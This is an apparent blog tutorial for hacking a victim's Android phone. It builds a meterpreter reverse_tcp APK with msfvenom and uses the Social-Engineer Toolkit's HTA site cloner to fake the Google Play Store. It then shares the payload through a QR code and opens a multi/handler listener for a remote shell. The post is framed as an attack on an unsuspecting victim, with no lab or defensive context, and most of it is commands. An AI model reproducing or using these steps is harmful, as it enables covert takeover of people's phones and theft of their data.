Hack Android Phone using HTA Attack with QR Code

at 9:31 AM Monday, November 21, 2016
QR Code is a 2 dimensional barcode which can be scanned using Smartphone’s or dedicated QR Readers. These QR Codes are directly linked to contact numbers, websites, usernames, photos, SMS, E-mails and even encryptions but they do not end here. QR Codes are big deal in Japan and it’s just a matter of time when take over whole world as there is growth in SEO.
Till now every one of you must have understood that QR Codes is the ‘next big thing’, let’s make it a big thing but in regards to hacking. Yes! In this article we are going to hack our victim’s mobile in some easy steps using QR Code. And all you need for this is your beloved Kali Linux.
Our step is to create a pernicious file using msfvenom.


Msfvenom –p android/meterpreter/reverse_tcp lhost=192.168.1.100 lport=6666 > /root/Desktop/Launcher.apk


Now open SET. Through SET we will alter HTA attack into an APK attack to gain access of the victim’s Smartphone. Thus, from the SET menu select 2nd option which indicates Website Attack Vectors?


Then further select 8th option which refers to HTA Attack Method.


And then select Site Cloner by typing 2.


When you type the said 2 option, it will ask you enter the URL that you want to clone. Here give the URL of play store: https://play.google.com/store


Then when it asks you to select meterpreter option type 3 as we want to select reverse_tcp.


Furthermore, save the launcher.apk file that you created using msfvenom to /var/www/html/


Also the change the name of launcher.hta to lancher.apk that your SET had just created as shown below


Now add The QR Code Extension to your chrome.



The QR Code Extension wills generate a QR Code for you according to your attack.

Now start multi/handler so you have your session in time and for this type:
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.100
set lport 6666
run


Now you can move ahead and make the victim scan your code. And install the app.


And Voila!! As soon as scanning of the code will be completed, you will have your meterpreter session.

Labels: ,

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)